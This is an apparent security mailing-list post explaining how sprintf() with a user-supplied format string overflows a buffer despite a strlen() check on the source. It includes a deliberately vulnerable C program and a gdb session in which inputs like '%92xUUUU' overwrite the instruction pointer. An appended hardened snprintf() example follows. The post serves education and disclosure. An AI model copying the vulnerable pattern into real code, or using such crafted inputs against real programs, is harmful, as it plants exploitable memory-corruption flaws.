Hello,
I don't know if this is new or not, but I thought I should post it anyway.
A format string bug can also be a buffer overflow, in the special case where
the program author uses sprintf() and assumes that the destination will end up
the same size as the source. That assumption usually takes the form of a
strlen() check on the source, or a malloc() that allocates exactly as much
space for the destination as the source occupies. There are many ways to make
the output of sprintf() longer than its source format string. Here's an example:
$ cat isuck.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char buf[80];
if (argc < 2) { puts("no arguments"); exit(1); }
if (strlen(argv[1]) > 79) { puts("too long argument"); exit(2); }
sprintf(buf, argv[1]); /* I suck! */
printf("buf --%s-- %d\n", buf, strlen(buf));
return 0;
}
$ gcc -Wall -O2 -pedantic -ansi -o isuck isuck.c
$ ./isuck
no arguments
$ ./isuck ''
buf ---- 0
$ ./isuck a
buf --a-- 1
$ ./isuck ab
buf --ab-- 2
$ ./isuck abc
buf --abc-- 3
$ ./isuck UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
too long argument
$ ./isuck UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
buf --UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU-- 79
$ ./isuck UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
buf --UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU-- 78
$ gdb ./isuck
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) r %x%x%x%x%x%x%x%x%x%x%xUUUUUUUU
Starting program: /home/metaur/isuck %x%x%x%x%x%x%x%x%x%x%xUUUUUUUU
buf --4009063e40151620393030346533363035313034303236313033393334333033333335363033363331333533UUUUUUUU-- 96
Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0x4014b080 1075097728
edx 0x6c 108
ebx 0x33333533 858993971
esp 0xbffffb40 0xbffffb40
ebp 0x55555555 0x55555555
esi 0x400164a0 1073833120
edi 0xbffffb94 -1073742956
eip 0x55555555 0x55555555
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) r %92xUUUU
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/metaur/isuck %92xUUUU
buf --4009063eUUUU-- 96
Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0x4014b080 1075097728
edx 0x6c 108
ebx 0x39303034 959459380
esp 0xbffffb50 0xbffffb50
ebp 0x65333630 0x65333630
esi 0x400164a0 1073833120
edi 0xbffffba4 -1073742940
eip 0x55555555 0x55555555
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) q
The program is running. Exit anyway? (y or n) y
$
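The following is an added example, not code from this post: it shows in a
defined way why the strlen() check in isuck.c does not bound what sprintf()
writes, and what the fixed call looks like. It measures the length of the
expanded output with vsnprintf() instead of writing it, and passes the %x
argument explicitly (the value 0x4009063e is just the number seen in the
gdb session above, chosen as sample input); the function names and the
BUF_SIZE constant are mine and match nothing in the original program.

```c
/* Added example (not the post's code): a source-length check versus the
 * real length of sprintf() output, and the hardened copy. C99. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 80   /* same size as buf[] in isuck.c (assumption: my constant) */

/* Length that sprintf(dst, fmt, ...) WOULD write, without writing anything:
 * vsnprintf with a NULL/0 destination returns the full length (C99). */
size_t formatted_length(const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    return n < 0 ? 0 : (size_t)n;
}

/* The check isuck.c relies on: it bounds the SOURCE, not the output. */
int source_check_passes(const char *src)
{
    return strlen(src) <= BUF_SIZE - 1;
}

/* If the expanded output does not fit in buf[] (79 chars plus NUL),
 * sprintf(buf, src) would have written past the end of the array. */
int would_overflow(size_t expanded)
{
    return expanded > BUF_SIZE - 1;
}

/* Hardened replacement for sprintf(buf, argv[1]): the user string is data,
 * never a format; the destination size bounds the write; the return value
 * reports truncation instead of silently corrupting the stack. */
int safe_copy(char *dst, size_t dstsz, const char *src)
{
    int n = snprintf(dst, dstsz, "%s", src);
    return n >= 0 && (size_t)n < dstsz;   /* 1 = copied whole, 0 = truncated */
}

/* Copy into an 80-byte buffer and report whether it arrived intact. */
int safe_copy_intact(const char *src)
{
    char buf[BUF_SIZE];
    return safe_copy(buf, sizeof buf, src) && strcmp(buf, src) == 0;
}

int main(void)
{
    /* Constructed input modelled on the post's gdb session; the %x argument
     * is supplied here explicitly so the measurement is well defined. */
    const char *attack = "%92xUUUU";
    size_t n = formatted_length(attack, 0x4009063eu);

    printf("strlen(\"%s\") = %zu, source check passes: %d\n",
           attack, strlen(attack), source_check_passes(attack));
    printf("expanded length = %zu, would overflow buf[%d]: %d\n",
           n, BUF_SIZE, would_overflow(n));
    printf("safe_copy keeps the string as data, intact: %d\n",
           safe_copy_intact(attack));
    return 0;
}
```

An 8-character argument passes the source check yet expands to 96 characters,
which is the number isuck printed just before crashing. With the argument
passed through "%s" it stays 8 characters, and snprintf()'s return value is
the check that belongs here: on the output size, not the input size.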
--
Ulf Harnhammar
http://www.advogato.org/person/metaur/